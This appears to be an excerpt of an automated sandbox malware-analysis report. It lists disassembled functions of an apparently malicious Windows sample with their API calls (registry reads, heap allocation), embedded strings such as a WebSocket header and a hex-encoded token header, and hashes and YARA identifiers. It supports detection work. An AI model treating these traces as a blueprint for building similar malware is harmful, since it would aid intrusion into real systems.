                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: ede2595f98ee915ca4c38eac564dd297dd56e541514c54d520e76a2925e05cc8
                                    • Instruction ID: 223b5753a2e4dfc45a77a9c5cbd282a924006ffb58093e9cdd11dc47c97d8e71
                                    • Opcode Fuzzy Hash: ede2595f98ee915ca4c38eac564dd297dd56e541514c54d520e76a2925e05cc8
                                    • Instruction Fuzzy Hash: 1B419D75601106ABCB61EF6CD988BEABBF8EF44740F10842DA849D7265EF34DD45CB90
                                    Function 000C3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000C3166
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C316D
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E5B8F8,00000000,00020119,?), ref: 000C318C
                                    • RegQueryValueExA.ADVAPI32(?,00E6D488,00000000,00000000,00000000,000000FF), ref: 000C31A7
                                    • RegCloseKey.ADVAPI32(?), ref: 000C31B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 0bd9de9ae9e245ef6ebd1ca44d3e36be1005fda186efd8805d5c2dff8c1f4edc
                                    • Instruction ID: 76c9e9299627d6966ba0826ee69db6301223bf7fd8cf6b5cbba1e61a098fdb00
                                    • Opcode Fuzzy Hash: 0bd9de9ae9e245ef6ebd1ca44d3e36be1005fda186efd8805d5c2dff8c1f4edc
                                    • Instruction Fuzzy Hash: 1B113D76A41209AFD710DF94EC49FABBBBCE748B11F00422AFA05A2680DB755D008BA1
                                    Function 000C90DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 7888404c694ee9d650f67b29d71f46f69ca004131a7f9a907d422edb7d2fe0d0
                                    • Instruction ID: 0983c994a09abd77d96756b1da131ef119224a269579eb396c918789e1c189fe
                                    • Opcode Fuzzy Hash: 7888404c694ee9d650f67b29d71f46f69ca004131a7f9a907d422edb7d2fe0d0
                                    • Instruction Fuzzy Hash: 8141C47150479CAEDB318B248D8DFFF7BF89B45704F1844ECE9CA86182E2719A458F20
                                    Function 000A8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000A8996
                                      • Part of subcall function 000CA1C0: std::exception::exception.LIBCMT ref: 000CA1D5
                                      • Part of subcall function 000CA1C0: std::exception::exception.LIBCMT ref: 000CA1FB
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000A89CD
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: invalid string position$string too long
                                    • API String ID: 2002836212-4289949731
                                    • Opcode ID: 29e45d8a2896767fde84da441dbc1bdf9f80925d96ff1f1f8884d214c616407f
                                    • Instruction ID: 3b02c7b4395cbb4a6f6a9abb16a4d69af1391834f0a3369efa7d92a4e5adb595
                                    • Opcode Fuzzy Hash: 29e45d8a2896767fde84da441dbc1bdf9f80925d96ff1f1f8884d214c616407f
                                    • Instruction Fuzzy Hash: B621EA723006508BD720DADCE840A6AF7D9DBA2761B15493FF142CB241DB71DC41C3A6
                                    Function 000A8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000A8883
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 6bc5194553a29373ffa595a1e127f797e47c5eb92224b8f69890cb4d97c34961
                                    • Instruction ID: 4df70111ba0ff23b9bdeaee443a33ab80dba86e3e51b7c283d0458b33c3d49b5
                                    • Opcode Fuzzy Hash: 6bc5194553a29373ffa595a1e127f797e47c5eb92224b8f69890cb4d97c34961
                                    • Instruction Fuzzy Hash: 6C31BBB5E005199FCB08DF58C8916AEBBB6EB89350F18C269E915EF345DB30AD01CBD1
                                    Function 000C5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5922
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5935
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_std::exception::exception
                                    • String ID: Sec-WebSocket-Version: 13$string too long
                                    • API String ID: 1928653953-3304177573
                                    • Opcode ID: 977cbc50c34db4290c03e3e0b13ebb93c7c147f831650efa1f483dfcff000fb6
                                    • Instruction ID: 90a18637552bbd596cc8523d870c8eb8cb8fb64abacdb547af5d60d766207244
                                    • Opcode Fuzzy Hash: 977cbc50c34db4290c03e3e0b13ebb93c7c147f831650efa1f483dfcff000fb6
                                    • Instruction Fuzzy Hash: 94112E35314B40CBC7218B2CAC00B1EB7E1EB96762F250A9EE4D18B695D771E881C7A5
                                    Function 000C3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,000CA430,000000FF), ref: 000C3D20
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C3D27
                                    • wsprintfA.USER32 ref: 000C3D37
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 08590fc592d72fd71e4c45854b02fd122b7b0fff0c11e430d8d3353dc0eecd6e
                                    • Instruction ID: f0d44fc17416012ba246a9ed7e6837685d453d883d3a4459724e9e5eee9ff864
                                    • Opcode Fuzzy Hash: 08590fc592d72fd71e4c45854b02fd122b7b0fff0c11e430d8d3353dc0eecd6e
                                    • Instruction Fuzzy Hash: 44018071A45714BFE7205B54FC4EF6ABB68FB45B62F104116FA059B2D0D7B41D00CAA1
                                    Function 000A8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000A8737
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 00b153c666219428dd420beb64f45f14c4c5345a47acbc0cbc7f6cfa8eb1abe6
                                    • Instruction ID: 0960e18ce333ed7eb7dbe9c087835989c4d458e10b2d12b2b69edae4a129c19b
                                    • Opcode Fuzzy Hash: 00b153c666219428dd420beb64f45f14c4c5345a47acbc0cbc7f6cfa8eb1abe6
                                    • Instruction Fuzzy Hash: 41F0B437F080220F8354647D8D8449EA94757E639033AD735E91AEF359EC70EC8296D5
                                    Function 000C86D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000C781C: __mtinitlocknum.LIBCMT ref: 000C7832
                                      • Part of subcall function 000C781C: __amsg_exit.LIBCMT ref: 000C783E
                                    • ___addlocaleref.LIBCMT ref: 000C8756
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                    • String ID: KERNEL32.DLL$Xu$xt
                                    • API String ID: 3105635775-946273361
                                    • Opcode ID: 919b1144a2120cabb4a0b52f1234340a96c97bcfd578718a4707e359d50567eb
                                    • Instruction ID: 9ccb41e68e470cbdc8a7a68d1176dea81a4a5fad75e59743a6cb55505ea2d2b5
                                    • Opcode Fuzzy Hash: 919b1144a2120cabb4a0b52f1234340a96c97bcfd578718a4707e359d50567eb
                                    • Instruction Fuzzy Hash: C001C471448B00DAE720AF79D805F8EB7E0AF01314F208A0EE1DA676E1CFB4A645CF15
                                    Function 000C1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 000C1FDF, 000C1FF5, 000C20B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strlen
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 39653677-4138519520
                                    • Opcode ID: 113d8e170c48ff9398251314ba5c71b9e9c0498b1f127e25a79d54f03a3c80c0
                                    • Instruction ID: 579143819a56ef3714f5fe94af7ea1f6a57cfe5546050eac1d5f71bda6d6c0b5
                                    • Opcode Fuzzy Hash: 113d8e170c48ff9398251314ba5c71b9e9c0498b1f127e25a79d54f03a3c80c0
